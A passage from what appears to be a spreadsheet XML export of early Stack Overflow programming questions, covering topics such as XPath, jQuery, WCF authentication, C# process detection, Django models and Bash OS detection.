&lt;p&gt;And Java seems really outdated -- no operator overloading or generic arrays?!&lt;/p&gt;
&lt;p&gt;So, my main question is: &lt;strong&gt;would anyone here start a new project using Java or is it just a dying language for legacy software?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;PS. &lt;em&gt;Both&lt;/em&gt; performance &lt;em&gt;and&lt;/em&gt; database connectivity are major priorities so that leaves slow Perl, Ruby, or Python and database-unfriendly C++ out of the question.&lt;/p&gt;
&lt;p&gt;PPS. For presentation layer I'm using Ruby on Rails.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF Authentication WITHOUT SSL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to setup authentication (ala "Basic Authentication") without actually setting up an SSL Certificate?  I'd also like to do this in REST or regular SOAP WCF Services, preferably in REST, but would like to be able to mix the services.  In other words, "I want to be able to send a regular old username and password just like in Basic Authentication but without the SSL."  Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Locating the node by value containing whitespaces using XPath</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to locate the node within an xml file by its value using XPath.
The problem araises when the node to find contains value with whitespaces inside.
F.e.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Root&amp;gt;
  &amp;lt;Child&amp;gt;value&amp;lt;/Child&amp;gt;
  &amp;lt;Child&amp;gt;value with spaces&amp;lt;/Child&amp;gt;
&amp;lt;/Root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can not construct the XPath locating the second Child node.&lt;/p&gt;
&lt;p&gt;Simple XPath /Root/Child perfectly works for both children, but /Root[Child=value with spaces] returns an empty collection.&lt;/p&gt;
&lt;p&gt;I have already tried masking spaces with &lt;strong&gt;%20&lt;/strong&gt;, &lt;strong&gt;&amp;amp; #20;&lt;/strong&gt;, &lt;strong&gt;&amp;amp; nbsp;&lt;/strong&gt; and using quotes and double quotes.&lt;/p&gt;
&lt;p&gt;Still no luck.&lt;/p&gt;
&lt;p&gt;Does anybody have an idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BlackBerry - Add items to a ListField</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone please give me a simple example on how to add three rows to a ListField so that the list shows something like this?&lt;/p&gt;
&lt;p&gt;Item 1&lt;/p&gt;
&lt;p&gt;Item 2&lt;/p&gt;
&lt;p&gt;Item 3&lt;/p&gt;
&lt;p&gt;I just want to show a list in which the user can select one of the items and the program would do something depending on the item selected.&lt;/p&gt;
&lt;p&gt;I've search all over the internet but it seems impossible to find a simple example on how to do this (most examples I found are incomplete) and the blackberry documentation is terrible.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Restricting symbols in a Linux static library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for ways to restrict the number of C symbols exported to a Linux static library (archive).  I'd like to limit these to only those symbols that are part of the official API for the library.  I already use 'static' to declare most functions as static, but this restricts them to file scope.  I'm looking for a way to restrict to scope to the library.&lt;/p&gt;
&lt;p&gt;I can do this for shared libraries using the techniques in Ulrich Drepper's &lt;a href="http://people.redhat.com/drepper/dsohowto.pdf"&gt;How to Write Shared Libraries&lt;/a&gt;, but I can't apply these techniques to static archives.  In his earlier &lt;a href="http://people.redhat.com/drepper/goodpractice.pdf"&gt;Good Practices in Library Design&lt;/a&gt; paper, he writes:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The only possibility is to combine all object files which need
  certain internal resources into one using 'ld -r' and then restrict the symbols
  which are exported by this combined object file. The GNU linker has options to
  do just this.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Could anyone help me discover what these options might be?  I've had some success with 'strip -w -K prefix_*', but this feels brutish.  Ideally, I'd like a solution that will work with both GCC 3 and 4.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How accurate is System.Diagnostics.Stopwatch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How accurate is &lt;strong&gt;System.Diagnostics.Stopwatch&lt;/strong&gt;? I am trying to do some metrics for different code paths and I need it to be exact.  Should I be using stopwatch or is there another solution that is more accurate.&lt;/p&gt;
&lt;p&gt;I have been told that sometimes stopwatch gives incorrect information.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect the OS from a Bash script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to keep my &lt;code&gt;.bashrc&lt;/code&gt; and &lt;code&gt;.bash_login&lt;/code&gt; files in version control so that I can use them between all the computers I use. The problem is I have some OS specific aliases so I was looking for a way to determine if the script is running on Mac&amp;nbsp;OS&amp;nbsp;X, Linux or &lt;a href="http://en.wikipedia.org/wiki/Cygwin"&gt;Cygwin&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What is the proper way to detect the operating system in a &lt;a href="http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29"&gt;Bash&lt;/a&gt; script?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Description of what an Interface does?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;Duplicate: &lt;a href="http://stackoverflow.com/questions/122883/interfaces-why-cant-i-seem-to-grasp-them"&gt;http://stackoverflow.com/questions/122883/interfaces-why-cant-i-seem-to-grasp-them&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;With regards to OOP,how would you describe an interface?&lt;/p&gt;
&lt;p&gt;What i mean is , sub-classing can be described as "Has-A" and Inheritance could be "Is-A".
A member method could be "Can-Do" ..&lt;/p&gt;
&lt;p&gt;Is there any way this could be extended (no pun intended) to describe what an Interface does?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>python introspection not showing functions for Lock</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try to use introspection to look at what methods are available on threading.Lock I don't see what I would expect.&lt;/p&gt;
&lt;p&gt;Specifically I don't see acquire, release or locked.  Why is this?&lt;/p&gt;
&lt;p&gt;Here's what I do see:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; dir (threading.Lock)
['__call__', '__class__', '__cmp__', '__delattr__', '__doc__', '__getattribute__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__self__', '__setattr__', '__str__']
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Comb Technology</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question is about the rare case of software that is neither in active development nor moribund.&lt;/p&gt;
&lt;p&gt;First, why is it so rare for software to ever be finished?  It seems "no longer in active development" is often synonymous with "moribund".  Second, what are exceptions to this?  Donald Knuth's TeX is a famous example.  It's been untouched for years yet remains massively popular.  Knuth even has a cash bug bounty, which is never claimed anymore.  There are probably various unix utilities like this, used ubiquitously yet with the source code in stasis.  I'd like to collect some interesting examples and commentary on why this is rare.&lt;/p&gt;
&lt;p&gt;Come to think of it, software is not unique in this regard.  I'm reminded of this gem from The Onion:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.theonion.com/content/node/29571" rel="nofollow"&gt;http://www.theonion.com/content/node/29571&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In fact, I propose a new term for software like TeX that is ubiquitous yet no longer under active development because it's bug free and just works:  "Comb Technology".  &lt;/p&gt;
&lt;p&gt;&lt;b&gt;What are interesting examples of Comb Technology in software?&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://yootles.com/outbox/so/comb.jpeg"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extraordinarily Simple Ruby Question: Where's My Class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;em&gt;[I'm just starting with Ruby, but "no question is ever too newbie," so I trudge onwards...]&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Every tutorial and book I see goes from Ruby with the interactive shell to Ruby on Rails. I'm not doing Rails (yet), but I don't want to use the interactive shell. I have a class file (first_class.rb) and a Main (main.rb). If I run the main.rb, I of course get the &lt;code&gt;uninitialized constant FirstClass&lt;/code&gt;. &lt;strong&gt;How do I tell ruby about the &lt;code&gt;first_class.rb&lt;/code&gt;?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it worth learning AMD-specific APIs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently learning the APIs related to Intel's parallelization libraries such as TBB, MKL and IPP. I was wondering, though, whether it's also worth looking at AMD's part of the puzzle. Or would that just be a waste of time? (I must confess, I have no clue about AMD's library support - at all - so would appreciate any advice you might have.)&lt;/p&gt;
&lt;p&gt;Just to clarify, the reason I'm going the Intel way is because 1) the APIs are very nice; and 2) Intel seems to be taking tool support as seriously as API support. (Once again, I have &lt;strong&gt;no clue&lt;/strong&gt; how AMD is doing in this department.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Factor GUI tutorial/example app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a non-trivial example application written in Factor language, pregerrably for GUI application which could server as a language tutorial?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strange nullreference exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have this code that takes care of command acknowledgment from remote computers, sometimes (like once in 14 days or something) the following line throws a null reference exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;computer.ProcessCommandAcknowledgment( commandType );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What really bugs me is that I check for a null reference before it, so I have &lt;strong&gt;no&lt;/strong&gt; idea whats going on.
Here's the full method for what its worth: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static void __CommandAck( PacketReader reader, SocketContext context )
	{
        string commandAck = reader.ReadString();
		Type commandType = Type.GetType( commandAck );
        Computer computer = context.Client as Computer;
        if (computer == null)
        {
            Console.WriteLine("Client already disposed. Couldn't complete operation");
        }
        else
        {
	     	computer.ProcessCommandAcknowledgment( commandType );
        }
	}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any clues?&lt;/p&gt;
&lt;p&gt;Edit: ProcessCommandAcknowledgment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	public void ProcessCommandAcknowledgment( Type ackType )
	{
		if( m_CurrentCommand.GetType() == ackType )
		{
			m_CurrentCommand.Finish();
		}
	}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to animate a change in css using jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to animate a change in css using jquery? &lt;/p&gt;
&lt;p&gt;If someone would be so kind as to provide me with an example i would be much obliged.&lt;/p&gt;
&lt;p&gt;Essentially, i am trying to animate the sprites technique by manipulating the background-image in the css using jQuery. The goal is to animate the hover so that I get a nice fade instead of just the abrupt switch produced by the code below.&lt;/p&gt;
&lt;p&gt;Here is where I'm at: &lt;/p&gt;
&lt;p&gt;HTML: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h1 id="solomon"&amp;gt;Solomon&amp;lt;/h1&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;CSS: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;body#default h1 {
text-indent: -9999px;
display: inline-block;
height: 213px;
}
body#default h1#solomon {
    background: transparent url(/images/S.gif) center top no-repeat;
    width: 183px;
    margin: 100px 0 0 216px;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;JQUERY: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(function() {
$('h1').hover(function() {
    $(this).stop().css('background-position', 'center bottom');
}, function() {
    $(this).stop().css('background-position', 'center top');
});
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Right now the it works fine, but there is no pretty animation on hover. I want to know how to animate the effect of switching the background-image placement.&lt;/p&gt;
&lt;p&gt;Thanks to whomever takes a shot at this. :) &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;i'm hoping someone can answer my question without pointing me to a tutorial? my issue with the tutorials is that they all force me to change my html which i am pretty locked into at this point. &lt;/p&gt;
&lt;p&gt;also, why doesn't the animate function work in my above example (@CMS)? &lt;/p&gt;
&lt;p&gt;thanks for your help everyone! :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jquery select class inside parent div</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to change the alt of the image i'm clicking by 
selecting the image's class 'add_answer'&lt;/p&gt;
&lt;p&gt;Note: .add_answer shows up multiple times inside different containing div's&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;jQuery(function(){   // Add Answer
	jQuery(".add_answer").click(function(){
	  var count = $(this).attr("alt");
	  count++;
	  $('.a_type_'+count+'').show();
	  $(this).parents("div:first").$('.add_answer').attr("alt", count);
	}); 
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This line doesn't seem to be working, how do i select this add_answer class
by way of it's parent div&lt;/p&gt;
&lt;pre&gt;
  $(this).parents("div:first").$('.add_answer').attr("alt", count);
&lt;/pre&gt;
&lt;p&gt;Anyone else have an idea?&lt;/p&gt;
&lt;p&gt;I'm trying having trouble decreasing the alt value on the .add_answer image when .destroy_answer is clicked&lt;/p&gt;
&lt;pre&gt;
    jQuery(function(){   // Hide Answer
        jQuery(".destroy_answer").click(function(){
          $(this).parents("div:first").hide();
           var count = $('.add_answer').attr("alt");
           count--;
           $('.add_answer',$(this).parent('div:first')).attr('alt',count);
        }); 
    });
&lt;/pre&gt;
&lt;p&gt;Problem line:&lt;/p&gt;
&lt;pre&gt;
  $('.add_answer',$(this).parent('div:first')).attr('alt',count);
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there a simple way in Python to create a file which can be written to in one thread and read in a different one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the python program I'm writing, I've got a thread which iterates over a large structure in memory and writes it incrementally into a file-like object.  I've got another thread which takes a file-like object and writes it to disk.  Is there an easy way to connect the two, such that any data input from the first thread will be buffered for the second?&lt;/p&gt;
&lt;p&gt;Specifically, I'm trying to pass data to subprocess.Popen().  The process will read from stdin, but you cannot pass a "file-like" object to Popen because it calls stdin.fileno() and blows up unless you have a real file.&lt;/p&gt;
&lt;p&gt;Instead, you need to pass the PIPE argument to Popen, which allows you to use proc.stdin as a file-like object.  But if you've already got a file-like object, there doesn't seem to be a great way to yolk the two of them together.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Seems like it should be easy: Landscape Scrolling Text Field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a application that I am working on that is in landscape mode and does not rotate. However I can not get the text field to rotate. I have been putting in way to many hours so don't be to harsh if this is a easy answer...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>which tool to use to view memory layout of multiple inheritance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a tool that I can use to see the multiple inheritance memory layout of compiled C++ code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Override a method at instance level</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in Python to override a class method at instance level?
For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Dog:
    def bark(self):
        print "WOOF"
boby = Dog()
boby.bark() # WOOF
# METHOD OVERRIDE
boby.bark() # WoOoOoF!!
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How I can get the calling methods in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/171970/how-can-i-find-the-method-that-called-the-current-method"&gt;How can I find the method that called the current method?&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I need a way to know the name of calling methods in C#.&lt;/p&gt;
&lt;p&gt;For instance:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void doSomething()
{
// I need to know who is calling me? (method1 or method2).
// do something pursuant to who is calling you?
} 
private void method1()
{
 doSomething();
}
private void method2()
{
 doSomething();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to write an automated test for thread safety</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class which is not thread safe:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Foo { 
    /* Abstract base class, code which is not thread safe */ 
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Moreover, if you have foo1 and foo2 objects, you cannot call foo1-&gt;someFunc() until foo2-&gt;anotherFunc() has returned (this can happen with two threads). This is the situation and it can't be changed (a Foo subclass is actually a wrapper for a python script).&lt;/p&gt;
&lt;p&gt;In order to prevent unwanted calls I've created the following -&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class FooWrapper {
public:
    FooWrapper(Foo* foo, FooWrappersMutex* mutex);
    /* Wrapped functions from Foo */
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Internally, FooWrapper wraps calls to the Foo functions with the shared mutex.&lt;/p&gt;
&lt;p&gt;I want to test FooWrapper for thread safety. My biggest problem is the fact that threads are managed by the operating system, which means I've got less control on their execution. What I would like to test is the following scenario:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thread 1 calls fooWrapper1-&gt;someFunc() and blocks while inside the function&lt;/li&gt;
&lt;li&gt;Thread 2 calls fooWrapper2-&gt;anotherFunc() and returns immediately (since someFunc() is still executing)&lt;/li&gt;
&lt;li&gt;Thread 1 finishes the execution&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What is the simplest to test a scenario like this automatically?&lt;/p&gt;
&lt;p&gt;I'm using QT on Win32, although I would prefer a solution which is at least cross-platform as QT is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex: How does the compiler know about dependencies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm completely new to Flex and am just having a play with a sample application from the Mate framework. I'm hacking on Linux so I'm using the command prompt and a text editor rather than Flex Builder.&lt;/p&gt;
&lt;p&gt;The sample app has two folders in its root directory lib &amp;amp; src. Lib contains a dependency. How can I compile the mxml file in src, so that the compiler knows about the dependency in lib?&lt;/p&gt;
&lt;p&gt;At the moment I'm running $ mxmlc sampleApp/src/sampleApp.mxml&lt;/p&gt;
&lt;p&gt;The compiler throws an exception saying that is couldn't resolve  to a component implementation. I know this component is part of the dependency in the lib folder. So it is obviously not being picked up automatically.&lt;/p&gt;
&lt;p&gt;Any help would be appreciated.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Chris&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Quick Java question: Casting an array of Objects into an array of my intended class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just for review, can someone quickly explain what prevents this from working (on compile):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private HashSet Data;
...
public DataObject[] getDataObjects( )
{
    return (DataObject[]) Data.toArray();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...and what makes this the way that DOES work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public DataObject[] getDataObjects( )
{
    return (DataObject[]) Data.toArray( new DataObject[ Data.size() ] );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not clear on the mechanism at work with casting (or whatever it is) that makes this so.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extern keyword and unresolved external symbols</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I drew a little graph in paint that explains my problem:&lt;/p&gt;
&lt;p&gt;But it doesn't seem to show up when I use the &lt;code&gt;&amp;lt;img&amp;gt;&lt;/code&gt; tag after posting?&lt;/p&gt;
&lt;p&gt;Graph:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i44.tinypic.com/103gcbk.jpg" alt="http://i44.tinypic.com/103gcbk.jpg"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configure Emacs FlyMake to use Rakefile as well as Makefile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been learning to use Emacs for a little while now. So far liking it a lot.&lt;/p&gt;
&lt;p&gt;My problem is that for little C codes I prefer using Rake instead of Make. However flymake does not seem to want anything else than Make. As it complains that it can not find Makefile. From the command line Rake is used in the same way as Make so I was wondering if there was some emacs configuration I could enter to allow Rake to be used by flymake?&lt;/p&gt;
&lt;p&gt;To correct a bit what I am doing. I'm not actually editing a Rakefile. And flymake-ruby does not help at all. I'm working with C code. I just use RAKE to compile the c code using gcc instead of MAKE.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery UI Datepicker and datejs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to have a datepicker where you can also just type basically I want to have the jQuery UI Datepicker and datejs in one. I want to type "tomorrow" and I want it to select the right day. I want to be able to type "saturday" and it actually getting the date right.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extend System.Windows.Forms.ComboBox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to extend the System.Windows.Forms.ComboBox control with a ReadOnly property, which would display the selected itemâ€™s text (similar to a label) when ReadOnly = true. (I do not like the disabled look achieved by setting Enabled=false)&lt;/p&gt;
&lt;p&gt;How do I do this in winforms? It was really simple in ASP.NET where all I had to do was override the Render method. It doesnâ€™t seem so straightforward with winforms however.&lt;/p&gt;
&lt;p&gt;From what I gather I need to &lt;/p&gt;
&lt;p&gt;a) Override the OnPaint method &lt;/p&gt;
&lt;p&gt;b) Call this.SetStyle(ControlStyles.UserPaint, true) so that OnPaint is called.&lt;/p&gt;
&lt;p&gt;But now it seems like I have to do ALL the painting myself. Is that true? Is it not possible to let the base ComboBox deal with painting the control when ReadOnly = false? Also, what ControlStyles should I be using?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use a ForeignKey in __unicode__ return?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following classes: Ingredients, Recipe and RecipeContent...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Ingredient(models.Model):
    name = models.CharField(max_length=30, primary_key=True)
    qty_on_stock = models.IntegerField()
    def __unicode__(self):
        return self.name
class Recipe(models.Model):
    name = models.CharField(max_length=30, primary_key=True)
    comments = models.TextField(blank=True)
    ingredient = models.ManyToManyField(Ingredient)
    def __unicode__(self):
        return self.name
class RecipeContent(models.Model):
    recipe = models.ForeignKey(Recipe)
    ingredients = models.ForeignKey(Ingredient)
    qty_used = models.IntegerField()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but for __unicode__() in RecipeContent I would like to use the Recipe name to which this RecipeContent belongs to... is there a way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preventing a second instance from running except in a specific case</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, I have this program and I don't want more than one instance of it running. So what I have right now is it grabs all instances that match it's name, and if there are more than one it quits and lets the user know it's already running in another instance.&lt;/p&gt;
&lt;p&gt;However, there is a special case in which the new instance will want change what the other instance is doing, then it will exit. How can I do this?&lt;/p&gt;
&lt;p&gt;Here's an example:
I have this program that times an event. I don't want more than one running at the same time because you can't be doing two things at once (for this application). Now say a third party program wants to notify this thread that the user is now working on something else, so it launches the application again. If the application is already running, it will update it's actions, else it will act as normal.&lt;/p&gt;
&lt;p&gt;How can this be done?&lt;/p&gt;
&lt;p&gt;This is what I use to tell if there is another instance running:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            string proc = Process.GetCurrentProcess().ProcessName;
            Process[] processess = Process.GetProcessesByName(proc);
            if (processess.Length &amp;gt; 1) {
                MessageBox.Show("There is an instance of the Timer already running");
                return;
            }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What are the steps I need to take to add nice java code formatting to my blogger/blogspot blog?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a sequence of steps to add java code formatting to my blogspot blog. &lt;/p&gt;
&lt;p&gt;I'm really looking for a dummies guide - something so simple a cleaner could follow it if they found it on a piece of paper on the floor. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>URL mapping in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I come from a Java background and with any servlets-based technology, it's trivial to map a range of URLs (eg /reports/&lt;em&gt;, /secure/&lt;/em&gt;.do) to a specified servlet.  Now I'm less familiar with PHP but I haven't yet seen anything that does quite the same thing with PHP (or mod_php).  It's entirely possible that I'm missing something simple.&lt;/p&gt;
&lt;p&gt;How do you do this in PHP?&lt;/p&gt;
&lt;p&gt;One of the reasons I want to do this is "one use" URLs.  Now this can sorta be done with GET parameters (like an MD5 hash token) but I'm interested in URL mapping as a general solution to many problems.&lt;/p&gt;
&lt;p&gt;Another big reason to use something like this is to have RESTful URLs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Count occurrences of a word in a row in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making a search function for my website, which finds relevant results from a database.  I'm looking for a way to count occurrences of a word, but I need to ensure that there are word boundaries on both sides of the word ( so I don't end up with "triple" when I want "rip").&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;People have misunderstood my question:&lt;/p&gt;
&lt;p&gt;How can I count the number of such occurences &lt;strong&gt;&lt;em&gt;within a single row?&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP vs. application server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For those of you who have had the opportunity of writing web applications in PHP and then as an application server (eg. Python-based solutions like CherryPy or Pylons), in what context are application servers a better alternative to PHP?&lt;/p&gt;
&lt;p&gt;I tend to favor PHP simply because it's available on just about any web server (especially shared host), but I'm looking for other good reasons to make an informed choice. Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it Wise to Spend Cash on a C++ Book Keeping in View the Upcoming C++0x?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just purchased &lt;em&gt;C++ GUI Programming with Qt4&lt;/em&gt; and after reading the code samples in this book I'm beginning to realize that my knowledge of C++ is incomplete. I learned C++ two years ago from online tutorials and a couple of ebooks I downloaded, and it turns out none of these resources were good enough. Since then I haven't touched the language and have been using Python instead.&lt;/p&gt;
&lt;p&gt;Now I'm thinking of purchasing a good book on C++ that covers advanced topics, and the one I have in mind is Bruce Eckel's &lt;em&gt;Thinking in C++&lt;/em&gt; (both volumes). I know they are available for free on the web, but I really can't stand reading books on a laptop screen.&lt;/p&gt;
&lt;p&gt;Since C++0x might be out pretty soon, is it wise to go ahead and spend cash on these books? Will C++0x break backwards compatibility? Volume 2 covers features like multithreading, templates etc. Would any of these features change significantly in C++0x?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to check for memory leaks in c++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm implementing a sparse matrix with linked lists and it's not fun to manually check for leaks, any thoughts? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>gridview control capable of displaying rich text in WinForms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a WinForms control that would allow me to display data in a table like manner but with some rich content such as different font colors, images. I do not need data-binding etc., just a "table of RichTextBox controls". I suppose it wouldn't be difficult to build such a control myself, but I thought I'd ask first...&lt;/p&gt;
&lt;p&gt;Thanks for your answers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lazy binding functions to multiple events with jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the scenario: I have a set of buttons that I want to bind to corresponding functions when clicked. The ids of these buttons are the same as the names of their corresponding functions. I could do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#kick").click(kick);
$("#push").click(push);
$("#shove").click(shove);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'm lazy and would like to do this more lazily (as is my nature). As the buttons are all contained in a block element, I'd like to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#button_holder &amp;gt; span").each(function () {
    var doThis = this.id;
    $(this).click(doThis);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Except that doesn't work. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web for mobile devices - best practices for ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Starting to build web applications for mobile devices (any phone). &lt;br/&gt;
What would be the best approach using ASP.NET 3.5/ASP.NET 4.0 and C#?
&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;UPDATE (feb2010) &lt;br/&gt;
Any news using windows mobile 7?&lt;br/&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to walk the methods and their properties contained in a DLL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using preferably JScript, but VBscript will also do, how does one walk a DLL obtaining the properties and their attributes contained therein?
Why? Because it would be good to ascertain the attributes of certain objects such as their datatypes at runtime rather than having to hard-code them before hand. An example of their use would be to initialise fields to their default values, e.g., spaces for strings, zeros for binaries and current date for dates.&lt;/p&gt;
&lt;p&gt;Cheers, John&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to show real-time suggestions (e.g. existing entries with same initial characters) while user is typing in a text field in Cocoa Touch?</t>
  </si>
  <si>
